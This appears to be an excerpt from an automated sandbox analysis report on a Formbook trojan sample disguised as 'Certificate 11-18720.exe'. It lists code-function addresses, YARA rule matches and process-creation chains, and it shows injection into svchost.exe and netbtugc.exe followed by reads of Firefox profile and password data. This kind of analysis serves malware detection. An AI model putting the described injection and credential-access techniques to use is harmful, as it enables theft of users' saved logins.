            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830CF21_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840C001_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0388739A1_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F132D1_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382D34C1_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038452A01_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B2C01_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E12ED1_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385D2F01_2_0385D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384B1B01_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387516C1_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382F1721_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390B16B1_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EF0CC1_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038470C01_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F70E91_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF0E01_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF7B01_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F16CC1_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038856301_2_03885630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DD5B01_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039095C31_2_039095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F75711_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF43F1_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038314601_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FB801_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B5BF01_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387DBF91_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFB761_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DDAAC1_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03885AA01_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E1AA31_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EDAC61_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFA491_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7A461_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B3A6C1_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D59101_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038499501_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B9501_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038438E01_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AD8001_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03841F921_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFFB11_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD21_2_03803FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD51_2_03803FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFF091_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03849EB01_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FDC01_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03843D401_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F1D5A1_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7D731_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFCF21_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B9C321_2_038B9C32
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C633172_2_05C63317
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C6B9E52_2_05C6B9E5
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C6B9E32_2_05C6B9E3
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C650C52_2_05C650C5
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C828C52_2_05C828C5
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C650BC2_2_05C650BC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C633652_2_05C63365
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C652E52_2_05C652E5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DC02C03_2_02DC02C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE02743_2_02DE0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E003E63_2_02E003E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D4E3F03_2_02D4E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFA3523_2_02DFA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DD20003_2_02DD2000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF81CC3_2_02DF81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E001AA3_2_02E001AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF41A23_2_02DF41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DC81583_2_02DC8158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DDA1183_2_02DDA118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D301003_2_02D30100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5C6E03_2_02D5C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D3C7C03_2_02D3C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D647503_2_02D64750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D407703_2_02D40770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DEE4F63_2_02DEE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF24463_2_02DF2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE44203_2_02DE4420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E005913_2_02E00591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D405353_2_02D40535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D3EA803_2_02D3EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF6BD73_2_02DF6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFAB403_2_02DFAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D6E8F03_2_02D6E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D268B83_2_02D268B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D4A8403_2_02D4A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D428403_2_02D42840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E0A9A63_2_02E0A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D429A03_2_02D429A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D569623_2_02D56962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFEEDB3_2_02DFEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D52E903_2_02D52E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFCE933_2_02DFCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D40E593_2_02D40E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFEE263_2_02DFEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D32FC83_2_02D32FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DBEFA03_2_02DBEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DB4F403_2_02DB4F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D60F303_2_02D60F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE2F303_2_02DE2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D82F283_2_02D82F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D30CF23_2_02D30CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE0CB53_2_02DE0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D40C003_2_02D40C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D3ADE03_2_02D3ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D58DBF3_2_02D58DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DDCD1F3_2_02DDCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D4AD003_2_02D4AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5B2C03_2_02D5B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5D2F03_2_02D5D2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE12ED3_2_02DE12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D452A03_2_02D452A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D8739A3_2_02D8739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D2D34C3_2_02D2D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF132D3_2_02DF132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DEF0CC3_2_02DEF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D470C03_2_02D470C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF70E93_2_02DF70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFF0E03_2_02DFF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D4B1B03_2_02D4B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E0B16B3_2_02E0B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D2F1723_2_02D2F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D7516C3_2_02D7516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF16CC3_2_02DF16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D856303_2_02D85630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFF7B03_2_02DFF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D314603_2_02D31460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFF43F3_2_02DFF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DDD5B03_2_02DDD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF75713_2_02DF7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DEDAC63_2_02DEDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DDDAAC3_2_02DDDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D85AA03_2_02D85AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE1AA33_2_02DE1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFA493_2_02DFFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF7A463_2_02DF7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DB3A6C3_2_02DB3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DB5BF03_2_02DB5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D7DBF93_2_02D7DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5FB803_2_02D5FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFB763_2_02DFFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D438E03_2_02D438E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DAD8003_2_02DAD800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D499503_2_02D49950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5B9503_2_02D5B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DD59103_2_02DD5910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D49EB03_2_02D49EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D03FD23_2_02D03FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D03FD53_2_02D03FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D41F923_2_02D41F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFFB13_2_02DFFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFF093_2_02DFFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFCF23_2_02DFFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DB9C323_2_02DB9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5FDC03_2_02D5FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF1D5A3_2_02DF1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D43D403_2_02D43D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF7D733_2_02DF7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_004615E03_2_004615E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0045C7C73_2_0045C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0045C7D03_2_0045C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0045C9F03_2_0045C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0045AA703_2_0045AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_004630EE3_2_004630EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_004630F03_2_004630F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00479FD03_2_00479FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4A0AF3_2_02A4A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4B8B43_2_02A4B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4B9D63_2_02A4B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4ADD83_2_02A4ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4BD6C3_2_02A4BD6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: String function: 005E6AC0 appears 42 times
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: String function: 005DEC2F appears 68 times
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: String function: 005EF8A0 appears 35 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02D75130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02DBF290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02D2B970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02D87E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02DAEA12 appears 86 times
            Source: Certificate 11-18720.exe, 00000000.00000003.1694898450.0000000003A63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-18720.exe
            Source: Certificate 11-18720.exe, 00000000.00000003.1695891243.0000000003C5D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-18720.exe
            Source: Certificate 11-18720.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/7
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060CE7A GetLastError,FormatMessageW,0_2_0060CE7A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005FAB84 AdjustTokenPrivileges,CloseHandle,0_2_005FAB84
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005FB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_005FB134
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0060E1FD
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00606532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00606532
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0061C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0061C18C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_005C406B
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeFile created: C:\Users\user\AppData\Local\Temp\aut15DD.tmpJump to behavior
            Source: Certificate 11-18720.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000003.00000003.2031301033.00000000007B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINH,{ENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: netbtugc.exe, 00000003.00000002.4134914771.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.2031301033.00000000007D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Certificate 11-18720.exeReversingLabs: Detection: 95%
            Source: unknownProcess created: C:\Users\user\Desktop\Certificate 11-18720.exe "C:\Users\user\Desktop\Certificate 11-18720.exe"
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-18720.exe"
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-18720.exe"Jump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
